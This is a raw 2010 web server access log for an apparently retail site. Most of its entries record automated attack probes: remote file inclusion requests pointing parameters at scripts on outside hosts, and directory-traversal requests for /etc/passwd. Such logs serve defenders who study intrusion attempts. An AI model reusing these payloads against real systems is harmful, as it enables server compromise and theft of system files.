139.168.143.136 - - [16/Apr/2010:01:03:55 -0400] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0214EE6C1B80C000F3A7021+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:03:56 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0214EE6C1B80C000F3A7021+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:03:56 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0214EE6C1B80C000F3A7021+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.236.47.182 - - [16/Apr/2010:01:04:02 -0400] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:04:02 -0400] "GET //administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:04:39 -0400] "GET //administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:04:42 -0400] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:01:05:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0214EE6C1BB0A000F9A7021+M37+ENG HTTP/1.1" 200 38037 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.16.102.2 - - [16/Apr/2010:01:05:17 -0400] "GET /logs/access_log.Q109090600///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
209.16.102.2 - - [16/Apr/2010:01:05:17 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
209.16.102.2 - - [16/Apr/2010:01:05:17 -0400] "GET /logs///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
209.16.102.2 - - [16/Apr/2010:01:05:42 -0400] "GET /logs/access_log.Q109110400///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
92.48.74.7 - - [16/Apr/2010:01:06:08 -0400] "GET /logs/access_log.Q109090600///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
92.48.74.7 - - [16/Apr/2010:01:06:08 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
92.48.74.7 - - [16/Apr/2010:01:06:08 -0400] "GET /logs///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
92.48.74.7 - - [16/Apr/2010:01:06:29 -0400] "GET /logs/access_log.Q109110400///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
66.249.67.232 - - [16/Apr/2010:01:06:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA2334D5033E688005A0309Q+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
111.235.137.50 - - [16/Apr/2010:01:07:21 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
110.45.147.226 - - [16/Apr/2010:01:07:21 -0400] "GET //ashnews.php?pathtoashnews=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
110.45.147.226 - - [16/Apr/2010:01:07:22 -0400] "GET /logs//ashnews.php?pathtoashnews=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
110.45.147.226 - - [16/Apr/2010:01:07:22 -0400] "GET /logs/access_log.Q110040400%20%20//ashnews.php?pathtoashnews=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:01:07:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:07:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:08:04 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:01:08:04 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
110.45.147.226 - - [16/Apr/2010:01:08:31 -0400] "GET /logs/access_log.Q110040400//ashnews.php?pathtoashnews=http://mytorg.net/ip1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.165.76.12 - - [16/Apr/2010:01:09:33 -0400] "GET /logs/error_log.Q110031800///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
64.165.76.12 - - [16/Apr/2010:01:09:33 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
64.165.76.12 - - [16/Apr/2010:01:09:34 -0400] "GET /logs///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
209.59.12.99 - - [16/Apr/2010:01:10:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.228.111.219 - - [16/Apr/2010:01:10:50 -0400] "GET /logs/error_log.Q110031800///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
67.228.111.219 - - [16/Apr/2010:01:10:50 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
67.228.111.219 - - [16/Apr/2010:01:10:50 -0400] "GET /logs///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
209.126.254.139 - - [16/Apr/2010:01:10:54 -0400] "GET ////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:10:54 -0400] "GET /logs////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:10:54 -0400] "GET /logs/access_log.Q110012600%20%20////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:10:57 -0400] "GET ////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:10:57 -0400] "GET /logs////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:10:57 -0400] "GET /logs/access_log.Q110012600%20%20////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:24 -0400] "GET ////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:24 -0400] "GET /logs////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:25 -0400] "GET /logs/access_log.Q110040300////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:11:27 -0400] "GET /logs//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:11:27 -0400] "GET /logs/access_log.Q109112600%20%20//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:11:27 -0400] "GET //include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:35 -0400] "GET ////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:35 -0400] "GET /logs////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:35 -0400] "GET /logs/access_log.Q110040300////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:36 -0400] "GET /logs/access_log.Q109112300%20%20////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:11:38 -0400] "GET /logs/access_log.Q109112300%20%20////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:07 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:07 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:07 -0400] "GET /logs/error_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:10 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:10 -0400] "GET /logs/error_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:10 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:11 -0400] "GET /logs/access_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:01:12:14 -0400] "GET /logs/access_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:12:22 -0400] "GET /logs/access_log.Q110012600////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.67.27 - - [16/Apr/2010:01:12:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC5371C6200065B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.126.254.139 - - [16/Apr/2010:01:12:27 -0400] "GET /logs/access_log.Q110012600////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:12:28 -0400] "GET //include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:12:28 -0400] "GET /logs/access_log.Q109112600%20%20//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:12:28 -0400] "GET /logs//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:28 -0400] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:28 -0400] "GET /?DOCUMENT_ROOT=http://dive2world.com/newdive/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:28 -0400] "GET /?DOCUMENT_ROOT=http://dive2world.com/newdive/1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:28 -0400] "GET /logs/access_log.Q109092200/?DOCUMENT_ROOT=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:28 -0400] "GET /logs/?DOCUMENT_ROOT=http://dive2world.com/newdive/1.txt? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:28 -0400] "GET /logs/?DOCUMENT_ROOT=http://dive2world.com/newdive/1.txt? HTTP/1.1" 200 46442 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:12:30 -0400] "GET ////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:12:30 -0400] "GET /logs////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:12:30 -0400] "GET /logs/access_log.Q110012600////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:42 -0400] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:42 -0400] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:42 -0400] "GET /logs/access_log.Q109123100/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:12:46 -0400] "GET /logs/access_log.Q109112300////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:12:48 -0400] "GET /logs//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:12:48 -0400] "GET /logs/access_log.Q109103100//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:12:48 -0400] "GET //akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:49 -0400] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:12:49 -0400] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:12:55 -0400] "GET //akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:12:55 -0400] "GET /logs//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:12:55 -0400] "GET /logs/access_log.Q109103100//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:13:03 -0400] "GET /logs/error_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:13:03 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:13:03 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.16.102.2 - - [16/Apr/2010:01:13:03 -0400] "GET /logs/error_log.Q109090800///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
209.16.102.2 - - [16/Apr/2010:01:13:03 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
209.16.102.2 - - [16/Apr/2010:01:13:03 -0400] "GET /logs///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
67.195.114.252 - - [16/Apr/2010:01:12:46 -0400] "GET /logs/error_log.Q109071500 HTTP/1.0" 200 2232707 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.102.6.110 - - [16/Apr/2010:01:13:04 -0400] "GET /logs/error_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:13:04 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:13:04 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
92.48.74.7 - - [16/Apr/2010:01:13:06 -0400] "GET /logs/error_log.Q109090800///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
92.48.74.7 - - [16/Apr/2010:01:13:06 -0400] "GET ///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
92.48.74.7 - - [16/Apr/2010:01:13:06 -0400] "GET /logs///index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
82.102.6.110 - - [16/Apr/2010:01:13:07 -0400] "GET /logs/access_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
82.102.6.110 - - [16/Apr/2010:01:13:08 -0400] "GET /logs/access_log.Q110030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:13:22 -0400] "GET /logs/access_log.Q109111400//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:01:13:28 -0400] "GET /logs//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:01:13:28 -0400] "GET //include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:01:13:28 -0400] "GET /logs/access_log.Q109112600%20%20//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:13:36 -0400] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:13:36 -0400] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:13:36 -0400] "GET /logs/access_log.Q109123100/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:01:13:41 -0400] "GET /logs/error_log.Q109111400//include/write.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:01:13:50 -0400] "GET /logs/error_log.Q109100900//akocomments.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:14:03 -0400] "GET ////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.126.254.139 - - [16/Apr/2010:01:14:04 -0400] "GET /logs////kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://armillum.com/tienda/qboard/id1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
